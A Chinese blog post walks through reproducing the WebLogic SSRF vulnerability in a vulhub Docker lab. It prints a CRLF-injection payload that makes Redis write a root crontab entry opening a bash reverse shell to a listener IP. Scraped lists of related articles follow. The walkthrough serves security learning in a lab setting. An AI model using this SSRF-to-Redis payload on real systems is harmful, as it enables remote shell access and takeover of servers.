weblogic ssrf漏洞复现
采用的虚拟机环境为ubuntu16.04,在虚拟机上搭建好docker环境。采用的vulhub来进行复现。
使用git来下载,命令为git clone https://github.com/vulhub/vulhub.git
进入ssrf漏洞中,
cd /vulhub/weblogic/ssrf
创建漏洞环境
docker-compose up -d
查看容器
docker ps
虚拟机地址为192.168.6.136,访问http://192.168.6.136:7001/uddiexplorer/SearchPublicRegistries.jsp
成功创建漏洞环境。
ssrf漏洞测试
打开代理工具拦截http请求包
可以看到参数中存在一个网址,将参数改为http://192.168.6.136:7001
再访问一个不存在的端口
从两次不同的http请求包结果中可知,weblogic中存在这ssrf漏洞。
查看weblogic容器的地址
docker inspect 642ac3b75ae8
同理 docker inspect fe0822abff42
注入HTTP头,利用Redis的反弹shell
通过SSRF探测内网中的Redis的服务器
想redis服务器发送命令
set 1 “\n\n\n\n* * * * * root bash -i >& /dev/tcp/监听ip/port 0>&1\n\n\n\n”
config set dir /etc/
config set dbfilename crontab
save
利用回车换行将三条命令连接,换行符号的url编码为%od%oa,注入的代码为
test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.19.0.1%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
在虚拟机中监听,容器的网关为172.19.0.1,即为虚拟机的地址。
发包
成功得到shell。
到此,漏洞成功复现。
http://www.taodudu.cc/news/show-719226.html
相关文章:
- DnsLog盲注
- weblogic常见漏洞
- JBoss 4.x 5.x 6.xJBossMQ JMS 反序列化漏洞
- 日志分析-ip溯源
- MAC地址泛洪攻击
- dnscat2搭建dns隧道
- windows远程下载
- 操作系统实验报告1:ucore Lab 1
- 操作系统实验报告2:Linux 下 x86 汇编语言1
- 操作系统实验报告3:Linux 下 x86 汇编语言2
- 操作系统实验报告4:Linux 下 x86 汇编语言3
- 操作系统实验报告5:进程的创建和终止
- 操作系统实验报告6:进程间通信—共享内存
- 操作系统实验报告7:进程间通信—共享内存。实现一个带有n个单元的线性表的并发维护。
- 操作系统实验报告8:进程间通信—消息机制
- 操作系统实验报告9:进程间通信—管道和 socket 通信
- 操作系统实验报告10:线程1
- 操作系统实验报告11:ucore Lab 2
- 操作系统实验报告12:线程2
- 操作系统实验报告13:线程池简单实现
- 操作系统实验报告14:Peterson 算法
- 操作系统实验报告15:进程同步与互斥线程池
- 操作系统实验报告16:CPU 调度
- 操作系统实验报告17:请求页面置换算法
- 操作系统实验报告18:硬盘柱面访问调度算法
- 用Unity3D实现简单的井字棋小游戏
- 用Unity3D实现简单的牧师与魔鬼游戏
- 用Unity3D实现简单的牧师与魔鬼游戏(动作分离版)
- 软件测试作业1:正确理解原型方法对软件生命周期不同阶段的支持
- 软件测试作业2:在敏捷宣言遵循的12条原则中挑选1条你感兴趣的原则进行风险评估
weblogic ssrf漏洞复现相关推荐
- Weblogic历史漏洞复现
Weblogic WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发.集成.部署和管理大型分布式 ...
- Weblogic SSRF漏洞
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis.fastcgi等脆弱组件. 2.影响版本 weblogic 10.0.2 – 10.3. ...
- Weblogic(CVE-2017-10271)漏洞复现
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271) 漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271 ...
- weblogic(CVE-2018-2628漏洞复现)
0.先提几个概念 JRMP:java remote method protocol,Java远程方法协议 JRMP是的Java技术协议的具体对象为希望和远程引用.JRMP只能是一个Java特有的,基于 ...
- weblogic 漏洞复现
cd vulhub/weblogic/CVE-2018-2894/ //进入对应得目录sudo service docker start //启动docker服务docker-compose up - ...
- [web攻防] weblogic 漏洞复现 CVE-2017-10271CVE-2018-2628CVE-2018-2894
用docker复现weblogic的部分高危漏洞,主要是记录下一些操作,积累自己的知识储备.由于时间与个人水平原因,不对原理做过多叙述. 目录 环境打开方式 CVE-2017-10271 weblog ...
- weblogic中间件漏洞总结
一.weblogic简介 WebLogic是美国Oracle公司出品的一个application server确切的说是一个基于JAVAEE架构的中间件,BEA WebLogic是用于开发.集成.部署 ...
- [Java安全]—weblogic常见漏洞
文章目录 前言 Weblogic 漏洞复现 Weblogic 文件读取 Weblogic 任意文件上传(CVE-2018-2894) 漏洞概述 漏洞复现 Weblogic 管理控制台未授权远程命令执行 ...
- SSRF漏洞的利用与攻击内网应用
首发于先知社区 0x00 前言 学过CSRF漏洞后,收获颇多.同时发现SSRF漏洞和CSRF漏洞有一点点类似之处. CSRF跨站请求伪造,基于客户端的请求伪造:SSRF服务器端请求伪造,基于服务端的请 ...
最新文章
- Drainage Ditches
- 并发-9-Callable和Future
- POJ 3278 Catch That Cow
- leetcode 593. Valid Square | 593. 有效的正方形(Java)
- Educational Codeforces Round 103 (Rated for Div. 2) D. Journey dp
- 七夕(情人节)表白女朋友,程序员应该如何装一波13
- 手把手教你入门Git --- Git使用指南(Linux)
- 批量取出PHP BOM头
- ContentProvider简单介绍
- 2021-09-03Dien
- Autorun 病毒清除工具
- ST-Link驱动安装不正确,设备管理器黄色感叹号,win10安装stlink驱动
- exe文件图标变成html,遭遇了一次exe文件图标丢失的问题
- 只有程序员才能读懂的西游记
- Linux内核态调用用户态函数
- 江苏省普通话水平测试计算机评分细则,江苏省普通话水平测试评分细则(试行).doc...
- 一元三次方程求根公式及韦达定理
- Spring boot in action pdf+源码
- 腾讯云全站加速有哪些功能?有哪些优势?适用于什么场景?
- java建立英文停用词表_pyhanlp 停用词与用户自定义词典
热门文章
- 去IOE:去掉“IE”就Ok?
- Oracle 安装报错 [INS-06101] IP address of localhost could not be determined 解决方法
- File stdin , line 1
- selenium+java的常使用的一些操作
- C++程序员笔试复习概要(一)
- 西南往事回忆录—工作点滴
- 堆中的路径 (25 分)
- mysql 分组查出来横向展示_Mysql探索(一):B+Tree索引
- php还原json,PHP语言中使用JSON和将json还原成数组
- Java黑皮书课后题第6章:6.11(金融应用:计算酬金)编写方法,利用编程练习题5.39中的方法计算酬金。方法头如下所示。编写程序,显示下面表格